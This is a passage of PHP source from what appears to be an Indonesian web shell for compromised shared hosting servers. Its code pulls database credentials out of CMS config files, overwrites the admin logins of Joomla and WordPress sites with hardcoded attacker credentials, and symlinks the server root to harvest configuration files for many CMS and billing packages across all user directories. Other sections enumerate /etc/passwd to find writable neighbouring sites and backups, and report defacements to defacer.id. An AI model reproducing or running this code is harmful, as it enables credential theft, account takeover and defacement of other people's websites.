"; } if($_POST['auto_cu_joomla']) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION,true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode("\r\n", $_POST['link']); $user = "amiqul1337"; $pass = "amiqul1337"; $passx = md5($pass); foreach($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config,"host = '","'"); $dbuser = ambilkata($config,"user = '","'"); $dbpass = ambilkata($config,"password = '","'"); $dbname = ambilkata($config,"db = '","'"); $dbprefix = ambilkata($config,"dbprefix = '","'"); $prefix = $dbprefix."users"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result['id']; $site = ambilkata($config,"sitename = '","'"); $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'"); echo "Config => ".$dir_config."
"; echo "CMS => Joomla
"; if($site == '') { echo "Sitename => error, gabisa ambil nama domain nya
"; } else { echo "Sitename => $site
"; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => Done , Username : $user Password : $pass

"; } mysql_close($conn); } } } elseif($_GET['config'] == 'grabber') { if(strtolower(substr(PHP_OS, 0, 3)) == "win"){ echo ''; exit; } if($_POST){ if($_POST['config'] == 'symvhosts') { @mkdir("symvhosts", 0777); exe("ln -s / symvhosts/root"); $htaccess="Options Indexes FollowSymLinks DirectoryIndex tokeichun69.htm AddType text/plain .php AddHandler text/plain .php Satisfy Any"; @file_put_contents("symvhosts/.htaccess",$htaccess); $etc_passwd=$_POST['passwd']; $etc_passwd=explode("\n",$etc_passwd); foreach($etc_passwd as $passwd){ $pawd=explode(":",$passwd); $user =$pawd[5]; $jembod = preg_replace('/\/var\/www\/vhosts\//', '', $user); if (preg_match('/vhosts/i',$user)){ exe("ln -s ".$user."/httpdocs/wp-config.php symvhosts/".$jembod."-Wordpress.txt"); exe("ln -s ".$user."/httpdocs/configuration.php symvhosts/".$jembod."-Joomla.txt"); exe("ln -s ".$user."/httpdocs/config/koneksi.php symvhosts/".$jembod."-Lokomedia.txt"); exe("ln -s ".$user."/httpdocs/forum/config.php symvhosts/".$jembod."-phpBB.txt"); exe("ln -s ".$user."/httpdocs/sites/default/settings.php symvhosts/".$jembod."-Drupal.txt"); exe("ln -s ".$user."/httpdocs/config/settings.inc.php symvhosts/".$jembod."-PrestaShop.txt"); exe("ln -s ".$user."/httpdocs/app/etc/local.xml symvhosts/".$jembod."-Magento.txt"); exe("ln -s ".$user."/httpdocs/admin/config.php symvhosts/".$jembod."-OpenCart.txt"); exe("ln -s ".$user."/httpdocs/application/config/database.php symvhosts/".$jembod."-Ellislab.txt"); }}} if($_POST['config'] == 'symlink') { @mkdir("symconfig", 0777); @symlink("/","symconfig/root"); $htaccess="Options Indexes FollowSymLinks DirectoryIndex tokeichun69.htm AddType text/plain .php AddHandler text/plain .php Satisfy Any"; @file_put_contents("symconfig/.htaccess",$htaccess);} if($_POST['config'] == '404') { @mkdir("sym404", 0777); @symlink("/","sym404/root"); $htaccess="Options Indexes FollowSymLinks DirectoryIndex tokeichun69.htm AddType text/plain .php AddHandler text/plain .php Satisfy Any IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=* IndexIgnore *.txt404 RewriteEngine On RewriteCond %{REQUEST_FILENAME} ^.*sym404 [NC] RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]"; @file_put_contents("sym404/.htaccess",$htaccess); } if($_POST['config'] == 'grab') { mkdir("configg", 0777); $isi_htc = "Options all\nRequire None\nSatisfy Any"; $htc = fopen("configg/.htaccess","w"); fwrite($htc, $isi_htc); } $passwd = $_POST['passwd']; preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach($user_config[1] as $user_tokeichun) { $grab_config = array( "/home/$user_tokeichun/.accesshash" => "WHM-accesshash", "/home/$user_tokeichun/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_tokeichun/public_html/forum/config.php" => "phpBB", "/home/$user_tokeichun/public_html/sites/default/settings.php" => "Drupal", "/home/$user_tokeichun/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_tokeichun/public_html/app/etc/local.xml" => "Magento", "/home/$user_tokeichun/public_html/admin/config.php" => "OpenCart", "/home/$user_tokeichun/public_html/application/config/database.php" => "Ellislab", "/home/$user_tokeichun/public_html/vb/includes/config.php" => "Vbulletin", "/home/$user_tokeichun/public_html/includes/config.php" => "Vbulletin", "/home/$user_tokeichun/public_html/forum/includes/config.php" => "Vbulletin", "/home/$user_tokeichun/public_html/forums/includes/config.php" => "Vbulletin", "/home/$user_tokeichun/public_html/cc/includes/config.php" => "Vbulletin", "/home/$user_tokeichun/public_html/inc/config.php" => "MyBB", "/home/$user_tokeichun/public_html/includes/configure.php" => "OsCommerce", "/home/$user_tokeichun/public_html/shop/includes/configure.php" => "OsCommerce", "/home/$user_tokeichun/public_html/os/includes/configure.php" => "OsCommerce", "/home/$user_tokeichun/public_html/oscom/includes/configure.php" => "OsCommerce", "/home/$user_tokeichun/public_html/products/includes/configure.php" => "OsCommerce", "/home/$user_tokeichun/public_html/cart/includes/configure.php" => "OsCommerce", "/home/$user_tokeichun/public_html/inc/conf_global.php" => "IPB", "/home/$user_tokeichun/public_html/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/wp/test/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/blog/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/beta/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/portal/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/site/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/wp/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/WP/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/news/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/wordpress/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/test/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/demo/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/home/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/v1/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/v2/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/press/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/new/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/blogs/wp-config.php" => "Wordpress", "/home/$user_tokeichun/public_html/configuration.php" => "Joomla", "/home/$user_tokeichun/public_html/blog/configuration.php" => "Joomla", "/home/$user_tokeichun/public_html/submitticket.php" => "^WHMCS", "/home/$user_tokeichun/public_html/cms/configuration.php" => "Joomla", "/home/$user_tokeichun/public_html/beta/configuration.php" => "Joomla", "/home/$user_tokeichun/public_html/portal/configuration.php" => "Joomla", "/home/$user_tokeichun/public_html/site/configuration.php" => "Joomla", "/home/$user_tokeichun/public_html/main/configuration.php" => "Joomla", "/home/$user_tokeichun/public_html/home/configuration.php" => "Joomla", "/home/$user_tokeichun/public_html/demo/configuration.php" => "Joomla", "/home/$user_tokeichun/public_html/test/configuration.php" => "Joomla", "/home/$user_tokeichun/public_html/v1/configuration.php" => "Joomla", "/home/$user_tokeichun/public_html/v2/configuration.php" => "Joomla", "/home/$user_tokeichun/public_html/joomla/configuration.php" => "Joomla", "/home/$user_tokeichun/public_html/new/configuration.php" => "Joomla", "/home/$user_tokeichun/public_html/WHMCS/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/whmcs1/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Whmcs/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/whmcs/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/whmcs/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/WHMC/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Whmc/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/whmc/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/WHM/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Whm/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/whm/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/HOST/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Host/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/host/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/SUPPORTES/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Supportes/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/supportes/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/domains/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/domain/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Hosting/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/HOSTING/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/hosting/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/CART/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Cart/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/cart/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/ORDER/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Order/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/order/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/CLIENT/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Client/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/client/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/CLIENTAREA/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Clientarea/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/clientarea/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/SUPPORT/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Support/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/support/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/BILLING/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Billing/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/billing/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/BUY/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Buy/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/buy/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/MANAGE/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Manage/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/manage/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/ClientSupport/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Clientsupport/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/clientsupport/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/CHECKOUT/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Checkout/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/checkout/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/BILLINGS/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Billings/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/billings/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/BASKET/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Basket/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/basket/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/SECURE/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Secure/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/secure/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/SALES/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Sales/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/sales/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/BILL/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Bill/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/bill/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/PURCHASE/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Purchase/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/purchase/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/ACCOUNT/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Account/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/account/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/USER/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/User/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/user/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/CLIENTS/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Clients/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/clients/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/BILLINGS/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/Billings/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/billings/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/MY/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/My/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/my/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/secure/whm/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/secure/whmcs/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/panel/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/clientes/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/cliente/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/support/order/submitticket.php" => "WHMCS", "/home/$user_tokeichun/public_html/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/boxbilling/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/box/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/host/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/Host/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/supportes/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/support/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/hosting/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/cart/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/order/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/client/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/clients/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/cliente/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/clientes/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/billing/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/billings/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/my/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/secure/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/support/order/bb-config.php" => "BoxBilling", "/home/$user_tokeichun/public_html/includes/dist-configure.php" => "Zencart", "/home/$user_tokeichun/public_html/zencart/includes/dist-configure.php" => "Zencart", "/home/$user_tokeichun/public_html/products/includes/dist-configure.php" => "Zencart", "/home/$user_tokeichun/public_html/cart/includes/dist-configure.php" => "Zencart", "/home/$user_tokeichun/public_html/shop/includes/dist-configure.php" => "Zencart", "/home/$user_tokeichun/public_html/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/hostbills/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/host/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/Host/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/supportes/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/support/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/hosting/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/cart/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/order/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/client/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/clients/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/cliente/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/clientes/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/billing/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/billings/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/my/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/secure/includes/iso4217.php" => "Hostbills", "/home/$user_tokeichun/public_html/support/order/includes/iso4217.php" => "Hostbills" ); foreach($grab_config as $config => $nama_config) { if($_POST['config'] == 'grab') { $ambil_config = file_get_contents($config); if($ambil_config == '') { } else { $file_config = fopen("configg/$user_tokeichun-$nama_config.txt","w"); fputs($file_config,$ambil_config); } } if($_POST['config'] == 'symlink') { @symlink($config,"symconfig/".$user_tokeichun."-".$nama_config.".txt"); } if($_POST['config'] == '404') { $sym404=symlink($config,"sym404/".$user_tokeichun."-".$nama_config.".txt"); if($sym404){ @mkdir("sym404/".$user_tokeichun."-".$nama_config.".txt404", 0777); $htaccess="Options Indexes FollowSymLinks DirectoryIndex tokeichun.htm HeaderName tokeichun.txt Satisfy Any IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble IndexIgnore *"; @file_put_contents("sym404/".$user_tokeichun."-".$nama_config.".txt404/.htaccess",$htaccess); @symlink($config,"sym404/".$user_tokeichun."-".$nama_config.".txt404/tokeichun.txt"); } } } } if($_POST['config'] == 'grab') { echo "
Done
"; } if($_POST['config'] == '404') { echo "
SymlinkNya
Configurations
"; } if($_POST['config'] == 'symlink') { echo "
Symlinknya
Configurations
"; }if($_POST['config'] == 'symvhost') { echo "
Root Server
Configurations
"; } }else{ echo "



"; $dcount = 1; foreach($d0mains as $d0main){ if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); echo ""; flush(); $dcount++;}}} echo "
S. No. Domains Users Symlink
" . $dcount . " ".$domains[1][0]." ".$user['name']." Symlink
"; }else{ $TEST=@file('/etc/passwd'); if ($TEST){ @mkdir("scripts",0777); @chdir("scripts"); exe("ln -s / root"); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex tokeichun.html AddType text/plain .php AddHandler text/plain .php Satisfy Any'; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3); @fclose($fp3); echo " "; $dcount = 1; $file = fopen("/etc/passwd", "r") or exit("Unable to open file!"); while(!feof($file)){ $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo ""; echo ""; $dcount++;}fclose($file); echo "
S. No. Users Symlink
" . $dcount . " " . $matches . "Symlink
";}else{if($os != "Windows"){@mkdir("scripts",0777);@chdir("scripts");@exe("ln -s / root");$file3 = ' Options Indexes FollowSymLinks DirectoryIndex tokeichun.html AddType text/plain .php AddHandler text/plain .php Satisfy Any '; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3);@fclose($fp3); echo "

server symlinker

"; $temp = "";$val1 = 0;$val2 = 1000; for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1); if ($uid)$temp .= join(':',$uid)."\n";} echo '
';$temp = trim($temp);$file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)){$s = fgets($file);$matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo ""; echo ""; $dcount++;} fclose($file); echo "
ID Users Symlink
" . $dcount . " " . $matches . "Symlink
";unlink("test.txt"); } else echo "
Cannot create Symlink
"; } } } elseif($_GET['do'] == 'defacerid') { echo "
Defacer:

Team:

Domains:

"; $site = explode("\r\n", $_POST['sites']); $go = $_POST['go']; $hekel = $_POST['hekel']; $tim = $_POST['tim']; if($go) { foreach($site as $sites) { $zh = $sites; $form_url = "https://www.defacer.id/notify"; $data_to_post = array(); $data_to_post['attacker'] = "$hekel"; $data_to_post['team'] = "$tim"; $data_to_post['poc'] = 'SQL Injection'; $data_to_post['url'] = "$zh"; $curl = curl_init(); curl_setopt($curl,CURLOPT_URL, $form_url); curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post)); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm) curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html'); $result = curl_exec($curl); echo $result; curl_close($curl); echo "
"; } } } elseif($_GET['do'] == 'jumping') { $i = 0; echo "
"; $etc = fopen("/etc/passwd", "r"); while($passwd = fgets($etc)) { if($passwd == '' || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_jumping); foreach($user_jumping[1] as $user_idx_jump) { $user_jumping_dir = "/home/$user_idx_jump/public_html"; if(is_readable($user_jumping_dir)) { $i++; $jrw = "[R] $user_jumping_dir
"; if(is_writable($user_jumping_dir)) { $jrw = "[RW] $user_jumping_dir
"; } echo $jrw; $domain_jump = file_get_contents("/etc/named.conf"); if($domain_jump == '') { echo " => ( gabisa ambil nama domain nya )
"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_jumping_url = $user_jumping_url['name']; if($user_jumping_url == $user_idx_jump) { echo " => ( $dj )
"; break; } } } } } } } if($i == 0) { } else { echo "
Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST']).""; } echo "
"; } elseif($_GET['do'] == 'salto') { $i = 0; echo "
"; $etc = fopen("/etc/passwd", "r"); while($passwd = fgets($etc)) { if($passwd == '' || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user); foreach($user[1] as $users) { $user_dir = "/home/$users/fantastico_backups"; if(is_readable($user_dir)) { $i++; $jrw = "[R] /home/$users/fantastico_backups
"; if(is_writable($user_dir)) { $jrw = "[RW] /home/$users/fantastico_backups
"; } echo $jrw; $domain_jump = file_get_contents("/etc/named.conf"); if($domain_jump == '') { echo " => ( gabisa ambil nama domain nya )
"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_url = $user_url['name']; if($user_url == $users) { echo " => ( $dj )
"; break; } } } } } } } if($i == 0) { } else { echo "
Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST']).""; } echo "
"; } elseif($_GET['do'] == 'backup') { $i = 0; echo "
"; $etc = fopen("/etc/passwd", "r"); while($passwd = fgets($etc)) { if($passwd == '' || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user); foreach($user[1] as $users) { $user_dir = "/home/$users/backup"; if(is_readable($user_dir)) { $i++; $jrw = "[R] /home/$users/backup
"; if(is_writable($user_dir)) { $jrw = "[RW] /home/$users/backup
"; } echo $jrw; $domain_jump = file_get_contents("/etc/named.conf"); if($domain_jump == '') { echo " => ( gabisa ambil nama domain nya )
"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_url = $user_url['name']; if($user_url == $users) { echo " => ( $dj )
"; break; } } } } } } } if($i == 0) { } else { echo "
Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST']).""; } echo "
"; } elseif($_GET['do'] == 'backups') { $i = 0; echo "
"; $etc = fopen("/etc/passwd", "r"); while($passwd = fgets($etc)) { if($passwd == '' || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user); foreach($user[1] as $users) { $user_dir = "/home/$users/backups"; if(is_readable($user_dir)) { $i++; $jrw = "[R] /home/$users/backups
"; if(is_writable($user_dir)) { $jrw = "[RW] /home/$users/backups
"; } echo $jrw; $domain_jump = file_get_contents("/etc/named.conf"); if($domain_jump == '') { echo " => ( gabisa ambil nama domain nya )
"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_url = $user_url['name']; if($user_url == $users) { echo " => ( $dj )
"; break; } } } } } } } if($i == 0) { } else { echo "
Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST']).""; } echo "
"; } elseif($_GET['do'] == 'auto_edit_user') { if($_POST['hajar']) { if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) { echo "username atau password harus lebih dari 6 karakter"; } else { $user_baru = $_POST['user_baru']; $pass_baru = md5($_POST['pass_baru']); $conf = $_POST['config_dir']; $scan_conf = scandir($conf); foreach($scan_conf as $file_conf) { if(!is_file("$conf/$file_conf")) continue; $config = file_get_contents("$conf/$file_conf"); if(preg_match("/JConfig|joomla/",$config)) { $dbhost = ambilkata($config,"host = '","'"); $dbuser = ambilkata($config,"user = '","'"); $dbpass = ambilkata($config,"password = '","'"); $dbname = ambilkata($config,"db = '","'"); $dbprefix = ambilkata($config,"dbprefix = '","'"); $prefix = $dbprefix."users"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result['id']; $site = ambilkata($config,"sitename = '","'"); $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Joomla
"; if($site == '') { echo "Sitename => error, gabisa ambil nama domain nya
"; } else { echo "Sitename => $site
"; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/WordPress/",$config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target/wp-login.php
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Wordpress
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

